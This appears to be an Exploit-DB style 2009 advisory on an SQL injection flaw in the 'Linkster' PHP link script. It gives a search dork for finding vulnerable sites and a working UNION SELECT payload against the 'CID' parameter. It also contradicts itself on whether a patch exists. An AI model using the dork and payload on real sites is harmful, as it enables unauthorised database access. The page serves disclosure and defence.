Linkster - a PHP/MySQL link indexing script SQL Injection Vulnerability

vendor:

Linkster

by:

Angela Zhang

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Linkster

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2009

Linkster – a PHP/MySQL link indexing script SQL Injection Vulnerability

The Linkster script is vulnerable to SQL Injection. An attacker can exploit the vulnerability by injecting malicious SQL code in the 'CID' parameter of the linkster.php file. This can lead to unauthorized access to the database and potentially sensitive information leakage.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL Injection attacks. Users are advised to update to the latest version of the script that includes the necessary security patches.

Source

Exploit-DB raw data:

(o)=====================================================================================(o)

         -:-    Linkster - a PHP/MySQL link indexing script  SQL Injection Vulnerability    -:-


                Vendor   : http://gliebster.com
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :   15 - December - 2009

(o)======================================================================================(o)


Dork   :
   
       Powered by Linkster


Vulnerabilities   :

      http://server/path/linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--

(o)===========================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , str0ke


(o)===========================================================================================(o)